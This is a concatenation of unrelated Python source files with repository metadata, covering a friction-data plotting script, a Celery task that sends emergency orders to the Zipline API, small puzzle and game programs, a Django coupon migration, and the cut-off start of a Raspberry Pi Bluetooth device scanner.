# an .xlsx trace file and parses it with data.friction_data(path, load).
# NOTE(review): `data`, `load_gram_2`, `load_gram_4`, and the first
# `glass0_1um1` path are defined earlier in this script, above this section;
# the parsed frames are presumably DataFrames with 'travel' and 'load'
# columns (used by the plots below) -- TODO confirm against friction_data().
# ---------------------------------------------------------------------------
glass0_1um1df = data.friction_data(glass0_1um1, load_gram_2)
glass0_1um2 = 'data/20171006_PAC0.1umglass_2_vs_glass_657.4g_load_1.xlsx'
glass0_1um2df = data.friction_data(glass0_1um2, load_gram_2)
glass0_1um3 = 'data/20171006_PAC0.1umglass_3_vs_glass_657.4g_load_1.xlsx'
glass0_1um3df = data.friction_data(glass0_1um3, load_gram_2)
glass0_1um4 = 'data/20171006_PAC0.1umglass_4_vs_glass_657.4g_load_1.xlsx'
glass0_1um4df = data.friction_data(glass0_1um4, load_gram_2)
glass0_1um5 = 'data/20171006_PAC0.1umglass_5_vs_glass_657.4g_load_1.xlsx'
glass0_1um5df = data.friction_data(glass0_1um5, load_gram_2)
#5.6 um PAHT on glass vs glass, load = 657.4
glass5_6umHT1 = 'data/20171006_HT5.6um_glass_1_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT1df = data.friction_data(glass5_6umHT1, load_gram_2)
glass5_6umHT2 = 'data/20171006_HT5.6um_glass_2_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT2df = data.friction_data(glass5_6umHT2, load_gram_2)
glass5_6umHT3 = 'data/20171006_HT5.6um_glass_3_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT3df = data.friction_data(glass5_6umHT3, load_gram_2)
glass5_6umHT4 = 'data/20171006_HT5.6um_glass_4_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT4df = data.friction_data(glass5_6umHT4, load_gram_2)
glass5_6umHT5 = 'data/20171006_HT5.6um_glass_5_vs_glass_657.4g_load_1.xlsx'
glass5_6umHT5df = data.friction_data(glass5_6umHT5, load_gram_2)
#bare glass (0um) vs glass, load = 657.4
glass0um1 = 'data/20171006_bare_glass_1_vs_glass_657.4g_load_1.xlsx'
glass0um1df = data.friction_data(glass0um1, load_gram_2)
glass0um2 = 'data/20171006_bare_glass_2_vs_glass_657.4g_load_1.xlsx'
glass0um2df = data.friction_data(glass0um2, load_gram_2)
glass0um3 = 'data/20171006_bare_glass_3_vs_glass_657.4g_load_1.xlsx'
glass0um3df = data.friction_data(glass0um3, load_gram_2)
glass0um4 = 'data/20171006_bare_glass_4_vs_glass_657.4g_load_1.xlsx'
glass0um4df = data.friction_data(glass0um4, load_gram_2)
glass0um5 = 'data/20171006_bare_glass_5_vs_glass_657.4g_load_1.xlsx'
glass0um5df = data.friction_data(glass0um5, load_gram_2)
#5.9 um PAC on glass vs glass, load = 657.2 (note: parsed with load_gram_4)
glass5_9um1 = 'data/20171009_PAC_5.9umglass_1_vs_glass_657.2g_load_1.xlsx'
glass5_9um1df = data.friction_data(glass5_9um1, load_gram_4)
glass5_9um2 = 'data/20171009_PAC_5.9umglass_2_vs_glass_657.2g_load_1.xlsx'
glass5_9um2df = data.friction_data(glass5_9um2, load_gram_4)
glass5_9um3 = 'data/20171009_PAC_5.9umglass_3_vs_glass_657.2g_load_1.xlsx'
glass5_9um3df = data.friction_data(glass5_9um3, load_gram_4)
glass5_9um4 = 'data/20171009_PAC_5.9umglass_4_vs_glass_657.2g_load_1.xlsx'
glass5_9um4df = data.friction_data(glass5_9um4, load_gram_4)
glass5_9um5 = 'data/20171009_PAC_5.9umglass_5_vs_glass_657.2g_load_1.xlsx'
glass5_9um5df = data.friction_data(glass5_9um5, load_gram_4)
#
# plt.plot(glass0um1df['travel'], glass0um1df['load'], marker='.', linestyle='-', label = 'glass (0 um PA-C) vs glass', color = '#1f77b4ff')
# plt.plot(glass0um2df['travel'], glass0um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um3df['travel'], glass0um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um4df['travel'], glass0um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0um5df['travel'], glass0um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#1f77b4ff')
# plt.plot(glass0_1um1df['travel'], glass0_1um1df['load'], marker='.', linestyle='-', label = '0.1 um PA-C on glass vs glass', color = '#ff7f0eff')
# plt.plot(glass0_1um2df['travel'], glass0_1um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um3df['travel'], glass0_1um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um4df['travel'], glass0_1um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
# plt.plot(glass0_1um5df['travel'], glass0_1um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#ff7f0eff')
#
# plt.plot(glass1um1df['travel'], glass1um1df['load'], marker='.', linestyle='-', label = '1.1 um PA-C on glass vs glass', color = '#2ca02cff')
# plt.plot(glass1um2df['travel'], glass1um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um3df['travel'], glass1um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um4df['travel'], glass1um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
# plt.plot(glass1um5df['travel'], glass1um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#2ca02cff')
#
# plt.plot(glass3um1df['travel'], glass3um1df['load'], marker='.', linestyle='-', label = '3.3 um PA-C on glass vs glass', color = '#d62728ff')
# plt.plot(glass3um2df['travel'], glass3um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um3df['travel'], glass3um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um4df['travel'], glass3um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# plt.plot(glass3um5df['travel'], glass3um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#d62728ff')
# #
# plt.plot(glass5_9um1df['travel'], glass5_9um1df['load'], marker='.', linestyle='-', label = '5.9 um PA-C on glass vs glass', color = '#9467bdff')
# plt.plot(glass5_9um2df['travel'], glass5_9um2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um3df['travel'], glass5_9um3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um4df['travel'], glass5_9um4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# plt.plot(glass5_9um5df['travel'], glass5_9um5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#9467bdff')
# Only the 5.6 um PA-HT repeats are plotted; the series above stay commented out.
plt.plot(glass5_6umHT1df['travel'], glass5_6umHT1df['load'], marker='.', linestyle='-', label = '5.6 um PA-HT on glass vs glass', color = '#8c564bff')
plt.plot(glass5_6umHT2df['travel'], glass5_6umHT2df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT3df['travel'], glass5_6umHT3df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT4df['travel'], glass5_6umHT4df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.plot(glass5_6umHT5df['travel'], glass5_6umHT5df['load'], marker='.', linestyle='-', label = '_nolegend_', color = '#8c564bff')
plt.ylim(-0.1, 1.5)
plt.xlim(-2, 110)
plt.margins(0.2)
plt.xlabel('Travel Distance (mm)', fontsize=20)#
plt.ylabel('Frictional Force (N)', fontsize=20)
plt.legend(loc = 'upper right' ,prop={'size':10})
plt.tick_params(axis='both', which='major', labelsize=16)#
#plt.title('load vs distance', fontsize=24)#
plt.show()
| UTF-8 | Python | false | false | 8,785 | py | 11 | load_glass_glass.py | 10 | 0.703358 | 0.581446 | 0 | 138 | 62.65942 | 150 |
mchoccac/commcare-hq | 850,403,570,438 | 065030fefa3001e4d7dcd16ffe5e446adf579f36 | 04658b3e2a605a123c3c70727b2a94facc0714b3 | /custom/zipline/tasks.py | 652502972c11559bbd99a6f9c6be1fcd0efcbaff | []
| permissive | https://github.com/mchoccac/commcare-hq | ca35d00068eefdf4415e26886a8ad880cb8d78d0 | 88d5f5845f06f70f378f5d6090580c2e15b27460 | refs/heads/master | 2021-01-20T09:00:57.269410 | 2017-05-03T22:05:41 | 2017-05-03T22:05:41 | 90,211,626 | 0 | 0 | BSD-3-Clause | true | 2021-11-19T10:36:34 | 2017-05-04T02:11:02 | 2021-11-16T18:11:31 | 2021-11-19T10:36:30 | 615,456 | 0 | 0 | 12 | Python | false | false | import json
import requests
from celery.task import task
from custom.zipline.api import get_order_update_critical_section_key
from custom.zipline.models import EmergencyOrder, EmergencyOrderStatusUpdate
from django.conf import settings
from dimagi.utils.couch import CriticalSection
from dimagi.utils.logging import notify_exception
from dimagi.utils.parsing import json_format_datetime
from requests.auth import HTTPBasicAuth
# Status strings Zipline returns in the 'status' field of its JSON response.
ZIPLINE_STATUS_RECEIVED = 'received'
ZIPLINE_STATUS_REJECTED = 'rejected'
ZIPLINE_STATUS_ERROR = 'error'
# The timeout (in seconds) to use when making requests to Zipline
REQUEST_TIMEOUT = 120
# See send_emergency_order_request()
# RETRY_INTERVAL is in MINUTES (it is multiplied by 60 for the celery countdown).
RETRY_INTERVAL = 5
# Total number of send attempts allowed per order before giving up.
MAX_ATTEMPTS = 3
@task(ignore_result=True)
def send_emergency_order_request(order_id, attempt=1):
    """
    Celery task: load the EmergencyOrder, send it to Zipline under a critical
    section (serializing status updates for the same order), and persist the
    resulting status on the order.
    :param order_id: primary key of the EmergencyOrder to send
    :param attempt: current attempt number (see MAX_ATTEMPTS / RETRY_INTERVAL)
    """
    order = None
    try:
        with CriticalSection(
            [get_order_update_critical_section_key(order_id)],
            timeout=(REQUEST_TIMEOUT + 10)
        ):
            order = EmergencyOrder.objects.get(pk=order_id)
            order.status = _send_emergency_order_request(order, attempt)
            order.save()
    except Exception as e:
        notify_exception(
            None,
            message='[ZIPLINE] Error while sending order',
            details={
                'order_id': order_id,
                'attempt': attempt,
            }
        )
        # Bug fix: ``order`` was previously referenced unconditionally here,
        # raising a NameError (masking the real error) whenever the lookup
        # itself or acquiring the critical section failed. Only record the
        # error and schedule a retry when the order was actually loaded.
        if order is not None:
            create_error_record(order, 'Internal error: {}'.format(str(e)))
            handle_emergency_order_request_retry(order, attempt)
def _send_emergency_order_request(order, attempt):
    """
    Sends the emergency order request to Zipline.
    :param order: the EmergencyOrder that should be sent
    :param attempt: the current attempt number; in the event of errors, a total of MAX_ATTEMPTS will
    be made, separated by a wait time of RETRY_INTERVAL minutes
    :return: the new status to be set on the order
    """
    # The attempt counter is persisted by the caller's order.save().
    order.zipline_request_attempts += 1
    json_payload = get_json_payload_from_order(order)
    json_payload = json.dumps(json_payload)
    # POST with HTTP basic auth; any requests exception propagates to the caller.
    response = requests.post(
        settings.ZIPLINE_API_URL,
        auth=HTTPBasicAuth(settings.ZIPLINE_API_USER, settings.ZIPLINE_API_PASSWORD),
        data=json_payload,
        headers={'Content-Type': 'application/json'},
        timeout=REQUEST_TIMEOUT
    )
    # Non-200: schedule a retry, record the failure, report error status.
    if response.status_code != 200:
        handle_emergency_order_request_retry(order, attempt)
        create_error_record(order, 'Received HTTP Response {} from Zipline'.format(response.status_code))
        return EmergencyOrderStatusUpdate.STATUS_ERROR
    response_text = response.text
    try:
        # TypeError/ValueError covers both a None body and malformed JSON.
        response_json = json.loads(response_text)
    except (TypeError, ValueError):
        notify_exception(
            None,
            message='[ZIPLINE] Invalid JSON response received',
            details={
                'order_id': order.pk,
                'attempt': attempt,
            }
        )
        create_error_record(order, 'Could not parse JSON response from Zipline: {}'.format(response_text))
        handle_emergency_order_request_retry(order, attempt)
        return EmergencyOrderStatusUpdate.STATUS_ERROR
    # Map the Zipline-reported status onto our status constants.
    status = response_json.get('status')
    if status == ZIPLINE_STATUS_RECEIVED:
        handle_request_received(order)
        return EmergencyOrderStatusUpdate.STATUS_RECEIVED
    elif status == ZIPLINE_STATUS_REJECTED:
        reason = response_json.get('reason')
        handle_request_rejected(order, reason)
        return EmergencyOrderStatusUpdate.STATUS_REJECTED
    elif status == ZIPLINE_STATUS_ERROR:
        description = response_json.get('description')
        create_error_record(order, 'Error received from Zipline: {}'.format(description))
        return EmergencyOrderStatusUpdate.STATUS_ERROR
    else:
        # Unknown status: treat like a transient failure and retry.
        create_error_record(order, 'Unrecognized status received from Zipline: {}'.format(status))
        handle_emergency_order_request_retry(order, attempt)
        return EmergencyOrderStatusUpdate.STATUS_ERROR
def get_json_payload_from_order(order):
    """
    Build the JSON-serializable dict representing ``order`` in the format
    expected by the Zipline emergency order endpoint.
    :param order: the EmergencyOrder object
    :return: dict
    """
    product_list = []
    for product_code, info in order.products_requested.iteritems():
        product_list.append({
            'productCode': product_code,
            'quantityOrdered': info.get('quantity'),
        })
    payload = {
        'transactionType': 'emergencyOrder',
        'timestamp': json_format_datetime(order.timestamp),
        'orderId': order.pk,
        'locationCode': order.location_code,
        'products': product_list,
    }
    return payload
def handle_request_received(order):
    """
    Record on ``order`` that Zipline acknowledged receipt of the request.
    :param order: the EmergencyOrder for the request
    """
    status_update = EmergencyOrderStatusUpdate.create_for_order(
        order.pk, EmergencyOrderStatusUpdate.STATUS_RECEIVED)
    order.received_status = status_update
def handle_request_rejected(order, reason):
    """
    Record on ``order`` that Zipline rejected the request, keeping the
    rejection reason as the status update's additional text.
    :param order: the EmergencyOrder for the request
    """
    status_update = EmergencyOrderStatusUpdate.create_for_order(
        order.pk, EmergencyOrderStatusUpdate.STATUS_REJECTED, additional_text=reason)
    order.rejected_status = status_update
def create_error_record(order, error_message):
    """Persist an error status entry for ``order``; the new row is not returned."""
    EmergencyOrderStatusUpdate.create_for_order(
        order.pk, EmergencyOrderStatusUpdate.STATUS_ERROR, additional_text=error_message)
def handle_emergency_order_request_retry(order, current_attempt):
    """
    Schedule another send attempt for ``order`` unless the attempt budget
    (MAX_ATTEMPTS) has been used up. The delay is RETRY_INTERVAL minutes.
    :param order: the EmergencyOrder to retry
    :param current_attempt: the current attempt number
    """
    if current_attempt >= MAX_ATTEMPTS:
        return
    next_attempt = current_attempt + 1
    send_emergency_order_request.apply_async(
        args=[order.pk],
        kwargs={'attempt': next_attempt},
        countdown=(RETRY_INTERVAL * 60),
    )
| UTF-8 | Python | false | false | 5,880 | py | 2,110 | tasks.py | 1,408 | 0.672789 | 0.670238 | 0 | 169 | 33.792899 | 106 |
kevin-chau/cs61a | 12,773,232,747,390 | 6c5b0ad7f1efefefa6ef44a8d070f5d15d837cfc | 955252646b7c5d5b0f8e03eab0026eec02d09355 | /Midterm2/prime_generator.py | b53bbcad7dd197d6079638bfc4b40442ee47b63b | []
| no_license | https://github.com/kevin-chau/cs61a | 53ae0a11b37116d33a99a9d3abb19ad145db7bf6 | 0f2c841a0eef56845254948a85fa55aa7469bf38 | refs/heads/master | 2021-05-31T08:28:07.764846 | 2016-03-16T07:26:29 | 2016-03-16T07:26:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def make_prime_generator():
prime = 1
def prime_generator():
nonlocal prime
prime += 1
def is_prime(n):
for i in range(2,n):
if n % i == 0:
return False
return True
if prime == 2:
return 2
while not is_prime(prime):
prime += 1
return prime
return prime_generator
| UTF-8 | Python | false | false | 300 | py | 65 | prime_generator.py | 60 | 0.616667 | 0.593333 | 0 | 16 | 17.6875 | 28 |
cktang88/aoc2020 | 19,370,302,527,687 | 655630fb721b5461d7a5489cc288b98b986e36e1 | e7ad8f66053860cfe35fe5c2414d5aef4e75be4a | /17.py | 643df7e84edf189a6f3460184511f24ae8fab243 | []
| no_license | https://github.com/cktang88/aoc2020 | 896ebc43e7bccbd8c9b68b39e291e1afe9b5a689 | 58c380e29285803bef4e1c5aad8dfa9774ac6990 | refs/heads/main | 2023-02-01T12:06:35.630569 | 2020-12-18T00:27:58 | 2020-12-18T00:27:58 | 317,740,058 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
import pprint
from copy import deepcopy
# Read the puzzle grid (one row of '.'/'#' characters per line); the context
# manager fixes the original's leaked file handle.
with open('17a.txt', 'r') as inp:
    arr = [a.strip() for a in inp]
md = 7 # shift: padding added on every side so the pattern has room to grow
# Padded grid dimensions: width, height, and depth (z starts as one layer).
w = len(arr[0]) + md*2
h = len(arr) + md*2
l = 1 + md*2
pprint.pprint(arr)
print(w,h)
def mprint(mat2d):
    # Pretty-print one z-layer: collapse each row of characters into a string.
    rows = [''.join(row) for row in mat2d]
    pprint.pprint(rows)
# 3-D grid mat[z][x][y], all cells inactive ('.'), padded by `md` on each side.
mat = [[['.' for k in range(h)] for j in range(w)] for i in range(l)]
# Copy the 2-D starting pattern into the middle z-layer, offset by the padding.
# NOTE(review): the second axis was sized from len(arr[0]) (columns) but is
# indexed by the row number i -- only safe for square inputs; verify.
for i, row in enumerate(arr):
    for j, c in enumerate(row):
        if c == '#':
            mat[md][md+i][md+j] = '#'
# for m in mat:
mprint(mat[md])
# Bounds of the seeded region inside the padded grid.
x1,x2 = md, len(arr[0]) + md
y1,y2 = md, len(arr) + md
def numNeighbor(_i,_j,_k):
    """Count active ('#') cells among the 26 neighbors of (_i, _j, _k) in `mat`.

    Bug fix: the original used range(-1, 1), which yields only offsets -1 and
    0, so neighbors in the +1 direction on every axis were never inspected
    (only 7 of the 26 neighbor offsets were checked). range(-1, 2) covers all
    26, with (0, 0, 0) -- the cell itself -- explicitly skipped.
    """
    ans = 0
    for di in range(-1, 2):
        for dj in range(-1, 2):
            for dk in range(-1, 2):
                if di == dj == dk == 0:
                    continue
                if mat[_i + di][_j + dj][_k + dk] == '#':
                    ans += 1
    return ans
# One simulation cycle per c. range(1, 2) runs a single cycle -- presumably
# left at 1 for debugging (Advent of Code day 17 asks for 6); TODO confirm.
for c in range(1,2):
    newmat = deepcopy(mat)
    # Only cells within c steps of the seeded region can change this cycle.
    for i in range(md-c,md+c+1):
        for j in range(x1-c,x2+c+1):
            for k in range(y1-c,y2+c+1):
                n = numNeighbor(i,j,k)
                isActive = mat[i][j][k] == '#'
                print(i,j,k, n, isActive)
                # Precedence gives (n == 3) or (n == 2 and isActive): three
                # neighbors activates any cell, two keeps an active cell alive.
                if n ==3 or n==2 and isActive:
                    newmat[i][j][k] = '#'
                else:
                    newmat[i][j][k] = '.'
    # Swap in the new generation (this second deepcopy is redundant but harmless).
    mat = deepcopy(newmat)
    mprint(mat[md])
| UTF-8 | Python | false | false | 1,182 | py | 24 | 17.py | 21 | 0.51692 | 0.48731 | 0 | 53 | 21.301887 | 69 |
linxucc/tutu | 13,864,154,438,100 | dff8f2aeb3250b093727990a95479b65b351278a | 17768634cd100c294c57769fafaedfeafd5b6406 | /promotions/migrations/0005_auto_20180904_1920.py | 8f11a275f17578deafd79b03d0712c30cf186d89 | []
| no_license | https://github.com/linxucc/tutu | 52f9f37544723a55c81b377e906afdb904efe6fd | 9f79043a91390cabaf99cdc80cd914a12c9ca2f8 | refs/heads/master | 2020-03-22T04:00:31.473980 | 2018-09-27T05:31:12 | 2018-09-27T05:31:12 | 139,463,321 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.0.7 on 2018-09-04 11:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations (see file header); avoid hand
    # edits beyond what the schema requires.

    # Depends on sibling migrations in trips/orders/promotions plus the
    # swappable user model.
    dependencies = [
        ('trips', '0018_auto_20180904_1920'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('orders', '0010_auto_20180904_1920'),
        ('promotions', '0004_auto_20180830_0038'),
    ]

    # Creates Coupon and CouponTemplate, then links Coupon to its template,
    # order, and user via nullable SET_NULL foreign keys.
    operations = [
        migrations.CreateModel(
            name='Coupon',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('payment_YN', models.BooleanField(default=False, verbose_name='是否已支付(暂时保留)')),
                ('create_date_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('last_modify_date_time', models.DateTimeField(auto_now=True, verbose_name='上次修改时间')),
            ],
        ),
        migrations.CreateModel(
            name='CouponTemplate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100, verbose_name='优惠券名称')),
                ('description', models.CharField(max_length=100, verbose_name='优惠券描述')),
                ('valid_from_date', models.DateTimeField(verbose_name='生效日期与时间')),
                ('valid_to_date', models.DateTimeField(verbose_name='失效日期与时间')),
                ('valid_flag', models.BooleanField(verbose_name='是否有效超级开关')),
                ('issued_count', models.IntegerField(default=0, verbose_name='已发放数量')),
                ('redeemed_count', models.IntegerField(default=0, verbose_name='已使用数量')),
                ('coupon_type', models.CharField(choices=[('DISCOUNT', '折扣'), ('CASH', '直减')], max_length=15, verbose_name='优惠减免类型')),
                ('cash_value', models.IntegerField(blank=True, null=True, verbose_name='直减金额')),
                ('discount_value', models.DecimalField(blank=True, decimal_places=2, max_digits=2, null=True, verbose_name='折扣比例(小数)')),
                ('create_date_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
                ('last_modify_date_time', models.DateTimeField(auto_now=True, verbose_name='上次修改时间')),
                ('related_trip', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to='trips.Trip', verbose_name='关联活动')),
                ('related_user', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='关联用户')),
            ],
            options={
                'verbose_name': '优惠券',
                'verbose_name_plural': '优惠券s',
            },
        ),
        migrations.AddField(
            model_name='coupon',
            name='coupon_template_reference',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='promotions.CouponTemplate', verbose_name='关联优惠券模板对象'),
        ),
        migrations.AddField(
            model_name='coupon',
            name='order_reference',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='orders.Order', verbose_name='关联优惠码对象'),
        ),
        migrations.AddField(
            model_name='coupon',
            name='user_reference',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='关联用户对象'),
        ),
    ]
| UTF-8 | Python | false | false | 3,927 | py | 101 | 0005_auto_20180904_1920.py | 55 | 0.606276 | 0.585812 | 0 | 66 | 54.530303 | 185 |
AyakaKusakari/tic-tac-toe | 10,222,022,173,498 | ee5df82e7ec4e038fdee28aa31eafaef9cd54060 | edd5795d2aad0da51d0a34de4aefc6a3ccf0d9b9 | /tictactoe.py | 4bed38fb2d8eb4cb5e6df66ec61a35e14df42f81 | []
| no_license | https://github.com/AyakaKusakari/tic-tac-toe | e1b902217d45800822a6e22babda8764298c3097 | e22ef4f7fcf5bce4897eb81ec954cd0d079a9b27 | refs/heads/master | 2021-05-17T04:34:53.201550 | 2020-03-30T20:25:02 | 2020-03-30T20:25:02 | 250,626,397 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
1.最初のプレイヤーが記号を書き込む
2.その時点で記号が3つ並んでいるかを確認
3.次のプレイヤーが記号を書き込む
3以降は2〜3をくり返す
"""
start = """
_/_/_/_/_/_/_/_/_/_/_/_/_/
Tic Tac Toe
_/_/_/_/_/_/_/_/_/_/_/_/_/
【遊び方】
1~9で座標を選んでください。
※0を入力すると、ゲームが終了します。
"""
table = """
1|2|3
-----
4|5|6
-----
7|8|9
"""
win = """
"""
print(start)
print(table)
# 1~9までのリスト
candidates = [i for i in range(1, 10)]
# 先行
first_list = []
# 後攻
second_list = []
# カウント用
n = 1
# coordinate = the list of board squares (1-9) one player has marked so far.
def judgment(coordinate):
    """Return True if ``coordinate`` contains any of the eight winning lines.

    The original compared ``list(set(line) & set(coordinate))`` against a
    sorted literal, which silently relies on CPython's iteration order for
    small-int sets; a subset test states the intent and is portable.
    """
    winning_lines = (
        {1, 2, 3}, {4, 5, 6}, {7, 8, 9},   # rows
        {1, 4, 7}, {2, 5, 8}, {3, 6, 9},   # columns
        {1, 5, 9}, {3, 5, 7},              # diagonals
    )
    marked = set(coordinate)
    return any(line <= marked for line in winning_lines)
while True:
    # Odd-numbered moves: first player (o).
    if n % 2 == 1:
        print(f" ---{n}手目---\n")
        first = input("○の座標を入力してください:")
        # NOTE(review): int() raises ValueError on non-numeric input -- confirm
        # whether crashing on bad input is acceptable here.
        first = int(first)
        if first in candidates:
            # Mark the chosen square with "o" on the board string.
            table = table.replace(str(first), "o")
            # The square is no longer available.
            candidates.remove(first)
            # Record the move for the win check.
            first_list.append(first)
            print(table)
            n += 1
            if judgment(first_list):
                print(" ---------------\n| ○の勝ち!! |\n ---------------")
                break
        elif first == 0:
            print("\n -------------------------\n| ゲームを終了します。 |\n -------------------------")
            break
        else:
            print("\n※正しい座標を入力してください\n")
            continue
    # After the 9th move with no winner the game is a draw.
    elif n == 10:
        print(" -------------------\n| あいこでした。 |\n -------------------")
        break
    # Even-numbered moves: second player (x).
    else:
        print(f" ---{n}手目---\n")
        second = input("×の座標を入力してください:")
        second = int(second)
        if second in candidates:
            # Mark the chosen square with "x" on the board string.
            table = table.replace(str(second), "x")
            candidates.remove(second)
            second_list.append(second)
            print(table)
            n += 1
            if judgment(second_list):
                print(" ---------------\n| ×の勝ち!! |\n ---------------")
                break
        # Bug fix: this quit check was nested under the win check above, where
        # it could never fire (a square in `candidates` is never 0), so the x
        # player could not quit with 0. It now mirrors the o branch.
        elif second == 0:
            print("\n -------------------------\n| ゲームを終了します。 |\n -------------------------")
            break
        else:
            print("\n※正しい座標を入力してください\n")
            continue
| UTF-8 | Python | false | false | 3,842 | py | 2 | tictactoe.py | 1 | 0.431856 | 0.404598 | 0 | 114 | 24.710526 | 97 |
azhaganavr/Bluetooth_scan_store_send_receive | 14,216,341,794,909 | 8a1b8cc354c87786ea5a1f1dd13d2d42cc80317a | 1869d0ac4441b93faec2077e971ea9283fa3c43f | /bt_terminal_v1.py | f4697b7f66b674009dce498201f31782e8af3d5f | []
| no_license | https://github.com/azhaganavr/Bluetooth_scan_store_send_receive | 89906bbe665fcd5cc4acf116869b4e071bc04bc3 | b5af07ea1dd58d0977dc56756f01a09a80301288 | refs/heads/master | 2020-09-20T17:41:35.158438 | 2019-12-15T15:57:37 | 2019-12-15T15:57:37 | 224,550,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import socket
import subprocess
import os
import time
import csv
import itertools
import datetime
# Importing all necessary libraries
time.sleep(10) # To give a waiting period for the 3G modem to connect
# Loop state: counters/flags reused across scan cycles.
scan_var = 0
j = 0
row_count = 0
RSSI = 00 # Not used just for testing purpose
# NOTE(review): port 21 is conventionally FTP -- confirm the server really
# listens for this custom protocol on 21.
port = 21
bt_var = 0
scan_data_len = 0
scan_data_array = []
# Necessary variables are initialized
device_name = 'raspi_A' # Each device is given a unique name to identify itself
# Long-lived hcidump subprocess; its stdout is read line-by-line in the loop.
hci_dump = subprocess.Popen(["hcidump -a hci"], bufsize=0, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT) # Scanning data is taken from the hcidump
# Main loop: scan hcidump output for ~60 s, append de-duplicated sightings to
# today's CSV, then (when online) upload the CSV to the server and delete it.
while True:
    filename = 'bt_send_' + str(time.strftime('%d-%m-%Y')) + '.csv' # This command is used instead.
    print("Scanning for Bluetooth data.....")
    loop_time = time.time() + 60 # Scanning variable is intialized to current time value plus 300 Seconds
    try:
        while time.time() < loop_time: # A loop is started for scanning the data for the given duration
            # NOTE(review): `flag` is set but never read -- presumably leftover.
            flag = 0
            for i in range(0, 30, 1):
                inchar = hci_dump.stdout.readline() # We store the dump value in inchar
                char = str(inchar) # Convert it to string
                a, b, c = char.partition(
                    'bdaddr') # We store the 'baddr', the string before and after 'badddr' string in b,a,c
                if (
                        c): # c is the string that contains the MAC address , Mode variable followed by mode value, class variable followed by classs value, clock offset variable followed by clock offset and rssi variable followed by rssi value in an array
                    classification = []
                    device_class = []
                    device_class += c.split()[6] # the 6th element of array C consists of bluetooth class value
                    # Major device class is decoded from one hex digit, the
                    # minor class from the following two (Bluetooth CoD field).
                    case_array = {'0': 'Uncategorized', '1': 'Computer', '2': 'Phone', '3': 'LAN',
                                  '4': 'Audio/Video', '5': 'Peripheral', '6': 'Imaging', '7': 'Wearable', '8': 'Toys'}
                    device_type = case_array.get(device_class[5],
                                                 'default') # the 5th charecter decides the type of device
                    concat = str(device_class[6]) + str(
                        device_class[7]) # the 6th and 7th charecter gives a more detailed classification.
                    if device_class[5] == '0':
                        misc_array = {'00': 'Bluetooth Device'}
                        classification = misc_array.get(concat, 'default')
                    elif device_class[5] == '1':
                        computer_array = {'00': 'unasssigned', '04': 'Desktop Workstation', '08': 'Server class',
                                          '0c': 'Laptop', '10': 'Handheld PCA', '14': 'Palm Sized PDA',
                                          '18': 'Wearable'}
                        classification = computer_array.get(concat, 'default')
                    elif device_class[5] == '2':
                        phone_array = {'00': 'unasssigned', '04': 'Cellular', '08': 'Cordless', '0c': 'Smart',
                                       '10': 'Wired Modem or Access Gateway', '14': 'Common ISDN Access'}
                        classification = phone_array.get(concat, 'default')
                    elif device_class[5] == '4':
